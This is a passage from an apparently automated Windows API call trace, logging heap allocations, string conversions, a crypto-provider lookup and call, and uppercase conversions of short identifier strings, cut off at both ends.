hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.296] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0255.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.297] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.298] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.301] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0255.301] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.301] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0255.301] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.301] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.302] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.302] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.303] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.303] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.303] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.303] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.303] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.303] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.303] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.304] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.305] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.305] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.306] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.306] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.306] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.306] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.306] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.307] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.307] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.307] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.307] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.307] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.308] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.308] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.308] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.308] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.308] RtlAllocateHeap 